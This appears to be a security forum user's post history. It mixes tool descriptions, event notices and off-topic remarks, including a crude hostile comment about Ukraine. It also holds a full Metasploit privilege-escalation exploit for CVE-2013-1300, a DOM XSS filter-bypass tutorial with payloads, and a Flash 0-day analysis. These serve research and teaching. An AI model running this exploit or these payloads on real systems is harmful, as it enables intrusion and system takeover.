Everything posted by Nytro
-
ILSpy is the open-source .NET assembly browser and decompiler. Development started after Red Gate announced that the free version of .NET Reflector would cease to exist by the end of February 2011. ILSpy requires the .NET Framework 4.0.

Important links: Discussion forum, Issue Tracker, ILSpy plugin list, Build server

[h=2]ILSpy Features[/h]
[*] Assembly browsing
[*] IL Disassembly
[*] Support for C# 5.0 "async"
[*] Decompilation to C#
    Supports lambdas and 'yield return'
    Shows XML documentation
[*] Decompilation to VB
[*] Saving of resources
[*] Save decompiled assembly as .csproj
[*] Search for types/methods/properties (substring)
[*] Hyperlink-based type/method/property navigation
[*] Base/Derived types navigation
[*] Navigation history
[*] BAML to XAML decompiler
[*] Save Assembly as C# Project
[*] Find usage of field/method
[*] Extensible via plugins (MEF)
[*] Assembly Lists

[h=2]Screenshots[/h]
[*] Viewing IL (Build 199)
[*] Navigating Types (Build 199)
[*] Saving Resources (Build 199)
[*] Decompiling a Type to C# (Build 199)
[*] Decompiling a method with 'yield return' (Build 528)

Source: ILSpy
-
[h=1]Tangerine[/h]
Tangerine is a tool for inspecting Windows Phone applications. Based on XAPSpy. It allows you to do three things:
[*] Automate all routine work with XAP files (parsing, deploying etc.)
[*] Log method calls, including parameter values and return values
[*] Run your own code on method enter, on method exit or instead of a method
[*] Change parameter values using method code

Supports both Windows Phone 7 and Windows Phone 8 applications.

Current limitations on functions for instrumenting:
[*] only managed application assemblies get instrumented
[*] does not support functions with user types (e.g. custom type Product)
[*] does not support out parameters
[*] does not support method overloads

Minimum requirements: .NET Framework 4.0, Windows Phone SDK 7.0

More detailed documentation will be uploaded.

Contributors: Andrey Chasovskikh, Evgeny Bechkalo, Dmitriy Evdokimov

Source: https://github.com/andreycha/tangerine
-
[h=3]Save valuable time[/h]
Spending too much time trying to figure out issues in your app's user interface? Use XAML Spy, and you will know the answer in minutes.

[h=3]Real-time[/h]
XAML Spy provides a real-time view of your app's state. Examine and modify the properties of any element on-the-fly and see the changes reflected immediately in the running app.

[h=3]No more secrets[/h]
Do you want to browse files in the isolated storage? Want access to the UI automation tree? Need to understand your app's visual tree? Use XAML Spy, it's all there.

[h=3]Platform support[/h]
With full Silverlight, Windows Phone, Windows Store and WPF support, XAML Spy is here to help you get your app to the market quickly. No matter whether you are developing for the desktop, web, mobile or tablet.

[h=3]Proven technology[/h]
XAML Spy uses and extends the Silverlight Spy technology. Silverlight Spy is the de facto standard for visually debugging Silverlight and Windows Phone apps. Silverlight Spy users will notice many similarities and enjoy a great number of new features and improvements.

[h=3]Evaluate[/h]
Are you into Silverlight, Windows Phone, Windows Store or WPF app development? Try XAML Spy for free and see how it can assist you in understanding how your app really works.

Download: XAML Spy
Source: XAML Spy
-
[h=2].NET Reflector 8[/h]
[h=2]Look inside any .NET code[/h]
[*] Debugging your application: Follow bugs through your application to see where your problems lie – whether it's in your own code, third-party libraries, or components used by your application.
[*] Understand how applications work: Inherited applications with little or no documentation or comments are hard to develop. Use .NET Reflector to understand how the code runs and avoid bugs.
[*] SharePoint and other third-party platforms: Like many third-party platforms, SharePoint APIs and libraries aren't always well-documented. With .NET Reflector you can look inside their assemblies and see how they work and which APIs you can call.

Download: .NET Reflector - Download
Source: .NET Reflector - Understand and debug any .NET code
-
ImgMount Tool v.1.0.15

Description: Mounts an FFU image file as a virtual hard drive. After an image is mounted, Windows partitions can be accessed like a regular volume.

Usage: ImgMount <ImageFile>

Supported images:
- FFU v.2.0 (Lumia 920, Lumia 820 ...)

Supported OS:
- Windows 7
- Windows 8
- Windows XP not supported

Attached file: ImgMount.zip (49.2 KB)

Source: (FFU) ImgMount Tool v.1.0.15 - xda-developers
-
[h=2]Try JustDecompile[/h]
The free .NET decompiler that helps you recover lost source code or peer into assemblies
[*] Proven 10 times faster than competitors
[*] 72 hours support through our forums

[h=4]Download JustDecompile for free[/h]
Download installer

Source: JustDecompile Download
-
On June 2, 2014, starting at 19:00, TechHub Bucharest hosts the third edition of Sparks, an event that aims to bring together specialists and enthusiasts in the field of information security to discuss the latest threats to the infrastructures we own, build or administer. The third edition opens with Ionut Popescu, Penetration Tester at KPMG, with the presentation "Introduction to shellcode development", and Vali-Marius Malinoiu, Technical Expert at SparkWare Technologies, who will present a study entitled "Thief vs Hacker: Hacker went fishing". Info: Sparks #3 » Sparks
-
The High-Schooler Who Breaks Into NASA's Servers
Mihai Badici, May 17, 2014

One of our home-grown urban legends is that of the genius high-schooler who managed to break into the servers of prestigious institutions, most often NASA. I don't know why NASA's servers appear most often in these stories; I suppose the real "feat" would be to penetrate an NSA or FBI server before a squad of masked officers riding an F16 comes knocking at your door, but ever since the Moon landing NASA has remained in the collective imagination as the ultimate repository of high technology. Obviously, the agency really does have cutting-edge technology and significant contributions to the IT world, given the nature of its activity. Still, its line of business is space exploration, not server administration, and the budget restrictions after the end of the Cold War (what will happen now, after the start of the second one, remains to be seen) have been felt in its activity too. Which is why we can assume the institution does not go overboard with spending in this area, as it perhaps once did.

Anyone who administers a server with public access knows that every day, every installed service is subjected to attacks of all kinds; their logs are full of such records. Most of these are rather benign: "brute-force" attacks on the passwords of various accounts. The mechanism is simple: there are dictionaries of usernames and passwords; the attacker starts a program that will try all the ones in the dictionary. If your password is 1234, it will succeed in a few minutes; if not, it will try again and again. Another, slightly more sophisticated type of attack relies on known vulnerabilities. For example, the attacker knows that WordPress, the platform Contributors is built on, has a vulnerability in version x. Someone has written an "exploit", i.e. a program that knows how to take advantage of this vulnerability, and the attacker will use this exploit simply by trying it on any server running a web service. If it works, good; if not, on to the next one.

The point is that none of these attacks require great skill from the attacker. It's true that he must be relatively familiar with how the Internet works and know how to use a port scanner, but in essence he will be running a program written by someone else, available on the "black market" of the Internet, possibly in exchange for other information. The "genius high-schooler" only needs a computer and a good Internet connection. Plus lots and lots of free time, possibly with the blessing of parents convinced that skipping Romanian class will help him in his future career as a computer scientist.

On the other side of the barricade, the system administrator is a busy man, especially since the budget cuts have probably affected him too. In theory, he knows that a certain version of a piece of software is vulnerable, but he is subject to several constraints. The upgrade may require a series of preliminary tests that take time, or perhaps a certain application does not work on the new version and part of the code has to be rewritten. Perhaps he simply has another critical operation in progress and has postponed the upgrade by two days. Or perhaps the company that owns the server has not paid its maintenance contract, so the administrator has decided to stop applying patches.

Obviously, in this confrontation, those with more time usually win. And attackers are many (as I showed above, you don't need to know much) and have plenty of time on their hands. Unlike administrators, who are tied to an organization and subject to its constraints, they answer to nobody and have nothing better to do. For this reason, any good security plan starts from the assumption that such a situation will happen at some point and focuses (also) on the measures to take in such eventualities.

The public, however, is hungry for such news. Sometimes the police arrive at the attacker's door after the first scans, when the attacker is naive enough to attack a government server from his own IP address. From there, turning the molehill into a mountain takes just one step, and going from village gossip to the big newspaper headline about yet another genius youngster who broke into a NASA server (again) takes not even that.

Source: Liceanul ce sparge serverele NASA | Contributors
-
[h=1]Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)[/h]

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'msf/core/post/windows/reflective_dll_injection'
require 'rex'

class Metasploit3 < Msf::Exploit::Local
  Rank = GreatRanking

  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process
  include Msf::Post::Windows::FileInfo
  include Msf::Post::Windows::ReflectiveDLLInjection

  def initialize(info={})
    super(update_info(info, {
      'Name'           => 'Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)',
      'Description'    => %q{
        A kernel pool overflow in Win32k which allows local privilege escalation.
        The kernel shellcode nulls the ACL for the winlogon.exe process (a SYSTEM process).
        This allows any unprivileged process to freely migrate to winlogon.exe, achieving
        privilege escalation. Used in pwn2own 2013 by MWR to break out of chrome's sandbox.
        NOTE: when you exit the meterpreter session, winlogon.exe is likely to crash.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [
        'Nils', # Original Exploit
        'Jon',  # Original Exploit
        'Donato Capitella <donato.capitella[at]mwrinfosecurity.com>', # Metasploit Conversion
        'Ben Campbell <ben.campbell[at]mwrinfosecurity.com>' # Help and Encouragement
      ],
      'Arch'           => ARCH_X86,
      'Platform'       => 'win',
      'SessionTypes'   => [ 'meterpreter' ],
      'DefaultOptions' => {
        'EXITFUNC' => 'thread',
      },
      'Targets'        => [
        [ 'Windows 7 SP0/SP1', { } ]
      ],
      'Payload'        => {
        'Space'       => 4096,
        'DisableNops' => true
      },
      'References'     => [
        [ 'CVE', '2013-1300' ],
        [ 'MSB', 'MS13-053' ],
        [ 'URL', 'https://labs.mwrinfosecurity.com/blog/2013/09/06/mwr-labs-pwn2own-2013-write-up---kernel-exploit/' ]
      ],
      'DisclosureDate' => 'Dec 01 2013',
      'DefaultTarget'  => 0
    }))
  end

  def check
    os = sysinfo["OS"]
    unless (os =~ /windows/i)
      return Exploit::CheckCode::Unknown
    end

    file_path = expand_path("%windir%") << "\\system32\\win32k.sys"
    major, minor, build, revision, branch = file_version(file_path)
    vprint_status("win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}")

    case build
    when 7600
      return Exploit::CheckCode::Vulnerable
    when 7601
      if branch == 18
        return Exploit::CheckCode::Vulnerable if revision < 18176
      else
        return Exploit::CheckCode::Vulnerable if revision < 22348
      end
    end

    return Exploit::CheckCode::Unknown
  end

  def exploit
    if is_system?
      fail_with(Exploit::Failure::None, 'Session is already elevated')
    end

    if sysinfo["Architecture"] =~ /wow64/i
      fail_with(Failure::NoTarget, "Running against WOW64 is not supported")
    elsif sysinfo["Architecture"] =~ /x64/
      fail_with(Failure::NoTarget, "Running against 64-bit systems is not supported")
    end

    unless check == Exploit::CheckCode::Vulnerable
      fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system")
    end

    print_status("Launching notepad to host the exploit...")
    notepad_process_pid = cmd_exec_get_pid("notepad.exe")
    begin
      process = client.sys.process.open(notepad_process_pid, PROCESS_ALL_ACCESS)
      print_good("Process #{process.pid} launched.")
    rescue Rex::Post::Meterpreter::RequestError
      print_status("Operation failed. Hosting exploit in the current process...")
      process = client.sys.process.open
    end

    print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
    library_path = ::File.join(Msf::Config.data_directory, "exploits", "cve-2013-1300", "schlamperei.x86.dll")
    library_path = ::File.expand_path(library_path)

    print_status("Injecting exploit into #{process.pid}...")
    exploit_mem, offset = inject_dll_into_process(process, library_path)

    thread = process.thread.create(exploit_mem + offset)
    client.railgun.kernel32.WaitForSingleObject(thread.handle, 5000)

    client.sys.process.each_process do |p|
      if p['name'] == "winlogon.exe"
        winlogon_pid = p['pid']
        print_status("Found winlogon.exe with PID #{winlogon_pid}")
        if execute_shellcode(payload.encoded, nil, winlogon_pid)
          print_good("Everything seems to have worked, cross your fingers and wait for a SYSTEM shell")
        else
          print_error("Failed to start payload thread")
        end
        break
      end
    end
  end
end

Source: http://www.exploit-db.com/exploits/33213/
Info: https://labs.mwrinfosecurity.com/blog/2013/09/06/mwr-labs-pwn2own-2013-write-up---kernel-exploit/
-
It says right there on the page: "Note: For those of you interested, as of August 2012, my database has grown to over 60 million domain names. I am now offering this domain list for purchase."
-
Yougetsignal has a large IP-to-domain database; it doesn't search on Bing.
-
As far as I know, from a friend's case, he stopped paying the subscription and had no trouble with the courts/banks or whatever, only that everyone in his family, ALL of them, was no longer allowed to take out a subscription with that company. I think it was Vodafone.
-
The invoice isn't mandatory. They'll tell you "bring it next time you come by". You say you don't have it on you and that's it. I didn't understand exactly what you meant. "numai" (only) or "nu mai" (no longer)? And why would they sue you?
-
What could be posted in that category? The field is too "small" in relation to IT security.
-
[h=1]Security Summer School[/h]
From „Voodoo“ to „You Do“ via hex and fun. Proudly brought to you by ACS, Ixia and Hexcellents.

[h=2]Period[/h]
23rd of June - 10th of August 2014

[h=2]Links[/h]
Wiki, Facebook page, Google Plus page, E-mail contact address

[h=2]Summary[/h]
The first edition of a new Security Summer School focused on Practical Software Exploitation will take place between June 23rd and August 10th 2014, at the Faculty of Automatic Control and Computers, University POLITEHNICA of Bucharest. Students will go through an in-depth tour of what it means to discover, successfully exploit and patch a software vulnerability, and develop the necessary skills and insights needed to embark on such an endeavor. Activities will take place during two intensive training sessions per week as well as two Capture the Flag (CTF) contests that will be held mid-term and at the end of the summer school. The final CTF contest will be the highlight of the summer school, and students will be able to showcase the skills they have learned and be awarded prizes offered by Ixia.

[h=2]Application[/h]
We welcome students to apply via Stagii pe Bune. Choose „Security Summer School“ under the „Summer Schools“ heading, for the company „Facultatea de Automatica si Calculatoare, UPB“. Apart from filling out your CV, we want to see your h4x0r sk111z by solving a set of three challenges. Please download the challenge tasks, go through the README and then submit your solution on this Google form; you may edit your submission if you forget something during the first try. The deadline for submitting your answers is Sunday, May 25th. After May 25th we will organize a set of interviews to decide who will take part in the Security Summer School.

[h=3]Requirements[/h]
We expect good programming skills and a fair knowledge of the C programming language. Python and shell scripting skills are welcome. More than anything we expect a proactive attitude, a love for challenges and „tinkering“, and an interest in security and hacking.

[h=2]Location & Schedule[/h]
The Security Summer School will take place in the Faculty of Automatic Control and Computers, University POLITEHNICA of Bucharest, room EG106 (Ixia lab), first floor, EG wing. Activities will take place twice a week:
[*] Monday, 4pm-8pm
[*] Thursday, 9am-1pm
Each session will be highly practical: a presentation of a set of basic concepts on slides followed by hands-on activities (tutorials and tasks). The 9th-10th of August weekend is reserved for the final CTF contest and awards ceremony.

[h=2]Syllabus[/h]
[*] Introduction into the World of Security
    23rd of June: crash course CTF, OS (pmap, strace, ltrace, file descriptors, lsof, ldd), Linux dynamic analysis
    26th of June: assembly intro: registers, mnemonics, the stack, gdb (step instruction/read-only)
[*] Binary Formats
    30th of June: writing assembly, executable code analysis (IDA)
    3rd of July: from ELF to a process, PLT, PIC; gdb / IDA
[*] Vulnerability Assessment
    7th of July: overwrite data in GDB, overflows of all kinds: function pointers, vtable, local variables, format string, use after free
    10th of July: CTF Demo (4 challenge tasks)
[*] Vulnerability Discovery
    14th of July: stateless fuzzing (on files), fuzzer + gdb
    17th of July: stateful fuzzing (on protocol)
[*] Weaponizing the vulnerability
    21st of July: shellcode + stack, NUL terminator, call trampoline
    24th of July: DEP, ASLR
[*] Weaponizing the vulnerability II
    28th of July: information leak, canary value, format strings
    31st of July: ROP, remote + socket reuse
[*] Preventing vulnerabilities in your own code + Windows
    4th of August: secure programming techniques (sanitizing, system())
    7th of August: Windows: shellcode exploit on Windows (Immunity, WinDbg)

[h=2]Team[/h]
Adrian Șendroiu, Dan Gioga, Dragoș Comăneci, Radu Caragea, Răzvan Crainea, Răzvan Deaconescu, Silviu Popescu, Tudor Azoiței

[h=3]Supporting members[/h]
Irina Pre?a, Lucian Cojocar, Vlad Dumitrescu

In case of any inquiries please send us an e-mail.

Source: Security Summer School [Computer Science Department Wiki]
-
I piss on Ukraine. But it all ends at the Republic of Moldova or Romania.
-
We should be civilized enough not to start a war, especially since with today's nuclear weapons it doesn't take much for a few countries to "disappear". I am somewhat worried, for Romania and the Republic of Moldova, about the Russians, because they are capable of many things.
-
https://www.youtube.com/watch?feature=player_embedded&v=NJmi_QCbYGU + http://site.oasteafiara.net/2012/01/ce-ar-fi-daca-ati-recunoaste-ca.html
-
Without making any reference to the Russian-Ukrainian conflict, I think Romania is also heading toward a conflict with Russia. Slowly, slowly. Rogozin: "Romania closed its airspace to my plane. The Romanian authorities are not commenting on the information" | adevarul.ro. We are in NATO, the US should defend us, but I'm really curious whether they will. If they "attack" the Republic of Moldova, we should consider a conflict. Although Ukraine and the Republic of Moldova are "half" Russian (well, not quite), I think our relationship with Russia will not exactly be a friendly one. I'd be curious, if we have members from the Republic of Moldova who live there, to hear from them what the situation is.
-
Save the discussions somewhere as well. Is nobody from HY talking? PS: It would probably have been more interesting on TeamSpeak.
-
[h=1]An Experiment In Performing Remote Calls on x64[/h]
Posted on May 4, 2014 by admin

Recently I was trying to do something more than just executing code in the context of a remote process: I wanted to call a function remotely, including supplying arguments, and have the program continue execution afterwards. What I will present in this post is what I have quickly come up with to achieve the task. There certainly are edge cases (discussed at the end) where the code will run into issues, but the general logic of it is:
[*] Suspend all threads in the target process. This is achieved in the code with a call to the NtSuspendProcess native API.
[*] Allocate space in the process that will contain the x64 assembly code which will set up the parameters and stack to perform the call.
[*] Save all registers that will be used in performing the call. The example code does not save flags, but a full implementation will want to do that as well.
[*] Write in the parameters following the Windows x64 ABI (first four parameters in RCX, RDX, R8, and R9 respectively, with the rest on the stack). The caller will have to know and supply the stack offset to the other parameters.
[*] Set up the trampoline to perform the call.
[*] Resume the process via NtResumeProcess and let the call happen.
[*] Save the result of the call and continue execution.

Article: An Experiment In Performing Remote Calls on x64 | RCE Endeavors
-
A Short Anthology of Wretched Patriotism
Andrei Pleșu

I have published the texts below on other occasions too. I feel the need to remind readers of them, at a moment when the trumpets of a rudimentary, fiddler-style, sulky patriotism have rekindled spirits. Patriotism has come to be an indigestible mixture of tearful words and cave-dweller frowns. For its champions, the homeland must not be "helped" except with flattery and the flexing of biceps. The idea that you can love it desperately, saddened by the evils that disfigure it (and which, more than once, come from within ourselves) is too subtle for the parade barkers, convinced that fawning servilely in the lap of the dear little country is the optimal way to serve it, when in fact it is a kind of rather dishonourable spoiling. In general, the professionals of jingoistic rhetoric are, rather, people without identity, incapable of truly constructive deeds and, precisely for that reason, eager to save themselves by identifying with prouder ancestors. Gigi, taken by himself, is nothing. But Gigi as the "descendant" of Stephen the Great, or as a cousin of Brâncuși, begins to believe that he exists… Read more: adev.ro/n53au0
-
[h=1]Reverse DOM XSS[/h]
by Pedro Laguna on May 4, 2014

I recently came up with an idea about how to exploit a DOM XSS vulnerability that might be worth sharing here so others can use this trick, adapt it and defeat some poor filters with a little JavaScript and some creativity. During an engagement I found a piece of code similar to this one:

<a href="#" onclick="goToWebsite(this, 'url', '/ShowInfo.php?id=[INJECTION]&category=CARS');">

The code behind goToWebsite was something like this:

function goToWebsite(e, param, base) {
    window.location = base + param + "=" + actionURL.value;
}

It's a very clear example of DOM XSS where we can control the flow of the page using the window.location element. But why wasn't it a reflected XSS? Well, they had some filters in place. Double quotes ( " ), brackets ( < and > ) and even the semicolon ( ; ) were filtered, so we couldn't escape from the injection point, having to dig deeper into the goToWebsite function to find our way into executing arbitrary JavaScript. Lucky for us we were still allowed to use some characters that were necessary for this trick, like parentheses ( ( and ) ), quotes ( ' ) and dots ( . ).

For a DOM XSS attack we need to modify the address where window.location is going to navigate and make it go to the javascript: URL handler. But, in this case we couldn't write it directly, as the injection is happening in the middle of a string which contains a reference to a relative URL: "/ShowInfo.php?id="

How do we overcome this problem? Well, we cannot escape from the function call, but as we can insert quotes and parentheses we can modify the string that is received by the goToWebsite function like this:

<a href="#" onclick="goToWebsite(this, 'url', '/ShowInfo.php?id='.split('').reverse().join('').concat('&category=CARS');">

These functions (split, reverse and join) will reverse the string '/ShowInfo.php?id=' to be '=di?php.ofnIwohS/'. And we are using concat to make the code valid, and as it's at the end of the result string we don't care about modifying it. So now we need to insert our payload, the classic alert(1):

<a href="#" onclick="goToWebsite(this, 'url', '/ShowInfo.php?id=//)1(trela:tpircsavaj'.split('').reverse().join('').concat('&category=CARS');">

Now, if we execute that code, the resulting string will be:

javascript:alert(1)//=di?php.ofnIwohS/&category=CARS

Perfe... wait! What's this? Code is not being executed! We have managed to insert our JavaScript payload at the beginning of the string passed to window.location but the code is not being executed. A closer look at the generated code on the page revealed the mystery:

%2f%2f)1(trela%3Atpircsavaj'.split('').reverse().join('').concat('

Key characters such as the slash ( / ) and colon ( : ) were encoded, so our code wasn't able to execute. Time to think about how to bypass the encoding of these characters. JavaScript has the ability to replace a character inside a string, like replace('old', 'new'), so I thought I could use String.fromCharCode to bypass the character limitations and make my code execute, replacing '/' and ':' with two other characters that are not URL-encoded, like '~' and '+', but there was a problem: the comma character was also URL-encoded, so I couldn't use the replace function.

Time for the second trick! Apparently, in JavaScript, you can split a string by a character and then use another character to join the strings together, like this:

'abc-def'.split('-').join('!')

After being executed this will render abc!def. The best part? We are not using any forbidden characters! Just again our old friends quotes and parentheses. If we put everything together we have something like this in order to exploit this DOM XSS bug:

~~)1(trela+tpircsavaj'.split('').reverse().join('').split('~').join(String.fromCharCode(47)).split('+').join(String.fromCharCode(58))).concat('

That way I was able to execute JavaScript code in this particular scenario without using any forbidden char. I am pretty sure you will not find yourself in this exact situation in the future but hopefully you can use these two little tricks someday!

Source: Reverse DOM XSS | Pentura Labs's Blog
-
New Flash Player 0-day (CVE-2014-0515) used in watering-hole attacks
Vyacheslav Zakorzhevsky, Kaspersky Lab Expert

In mid-April we detected two new SWF exploits. After some detailed analysis it was clear they didn't use any of the vulnerabilities that we already knew about. We sent the exploits off to Adobe and a few days later got confirmation that they did indeed use a 0-day vulnerability that was later labeled as CVE-2014-0515. The vulnerability is located in the Pixel Bender component, designed for video and image processing.

We received a sample of the first exploit on April 14, while a sample of the second came on April 16. The first exploit was initially recorded by KSN on April 9, when it was detected by a generic heuristic signature. There were numerous subsequent detections on April 14 and 16. In other words, we succeeded in detecting a previously unknown threat using heuristics.

According to KSN data, these exploits were stored as movie.swf and include.swf at an infected site. The only difference between the two pieces of malware is their shellcodes. It should be noted that the second exploit (include.swf) wasn't detected using the same heuristic signature as the first, because it contained a unique shellcode.

Each exploit comes as an unpacked flash video file. The ActionScript code inside was neither obfuscated nor encrypted. As is usually the case with this kind of exploit, the first stage is a heap spray - preparing the dynamic memory for exploitation of the vulnerability. The exploits are also designed to check the OS version. If Windows 8 is detected, a slightly modified byte-code of the Pixel Bender component is used.

A fragment of the vulnerable Pixel Bender code (the data in the red box is changed according to system version)

Fragment of the decompiled exploit code

Next comes the actual exploitation of the vulnerability, namely modification of one of the indices in the table of methods/virtual functions.

Interestingly, both exploits have two shellcodes. The first is similar in both applications; it is quite short and prepares the memory for the successful functioning of the second shellcode.

A fragment of the first shellcode debugged in WinDBG

Firstly, the current memory is marked as read, write and execute with the API function VirtualProtect, and then additional memory is allocated using VirtualAlloc. The second shellcode is copied to this memory and control is transferred to it. The initialization of API functions and transfer of control to the second shellcode appear in red boxes in the screenshot above.

The exploits' second shellcodes differ significantly. The exploit that we detected first has a standard shellcode (movie.swf). It performs a search of system libraries in the memory, and then downloads and runs the payload. Unfortunately, the link turned out to be inactive at the time of our research.

Fragment of the movie.swf exploit's second shellcode responsible for the download and launch of the payload

In the other exploit - include.swf - the second shellcode was unusual. It receives the base DLL address for flash10p.ocx, searches it for specific fragments and interacts with ciscompeaddin5x0 - Cisco MeetingPlace Express Add-In version 5x0. This add-in is used by web-conference participants to view documents and images from the presenter's screen. It should be noted that the exploit will not work if the required versions of Adobe Flash Player ActiveX and Cisco MPE are not present on the system.

Fragment of the include.swf exploit's second shellcode

It appears that part of the information for the exploit include.swf is passed on from outside. According to KSN data, the referer to include.swf points to another SWF file: stream.swf. At the same time, the referer of the first exploit - movie.swf - points to index.php located in the same folder as the exploit (see below).

We couldn't establish the exact payload of the exploit include.swf due to a lack of data relayed from the landing page and/or other exploits. We are sure that all these tricks were used in order to carry out malicious activity against a very specific group of users without attracting the attention of security solutions. We believe that the Cisco add-in mentioned above may be used to download/implement the payload as well as to spy directly on the infected computer.

Both the exploits detected by us spread from a site located at jpic.gov.sy. The site was launched back in 2011 by the Syrian Ministry of Justice and was designed as an online form for citizens to complain about law and order violations. We believe the attack was designed to target Syrian dissidents complaining about the government. The site was hacked in September 2013, something the alleged hacker announced on his twitter account. The link to these exploits is as follows: http://jpic.gov.sy/css/images/_css/***********. When we entered the site, the installed malware payloads were already missing from the "_css" folder. We presume the criminals created a folder whose name doesn't look out of place on an administration resource, and where they loaded the exploits. The victims were probably redirected to the exploits using a frame or a script located at the site.

To date, April 28, the number of detections by our products has exceeded 30. They were detected on the computers of seven unique users, all of them in Syria, which is not surprising considering the nature of the site. Interestingly, all the attacked users entered the website using various versions of Mozilla Firefox.

It's likely that the attack was carefully planned and that professionals of a pretty high caliber were behind it. The use of professionally written 0-day exploits that were used to infect a single resource testifies to this. Moreover, while the first exploit is pretty standard and can infect practically any unprotected computer, the second exploit (include.swf) only functions properly on computers where Adobe Flash Player 10 ActiveX and Cisco MeetingPlace Express Add-In are installed. The Flash Player Pixel Bender component, which Adobe no longer supports, was used as the attack vector. The authors were counting on the developers not finding a vulnerability in that component and that the exploit would remain active for longer. All this suggests that the attackers were not targeting users en masse.

We detect such exploits by AEP technology as PDM:Exploit.Win32.Generic and by heuristics as HEUR:Exploit.SWF.CVE-2014-0515.gen.

Source: https://www.securelist.com/en/blog/8212/New_Flash_Player_0_day_CVE_2014_0515_used_in_watering_hole_attacks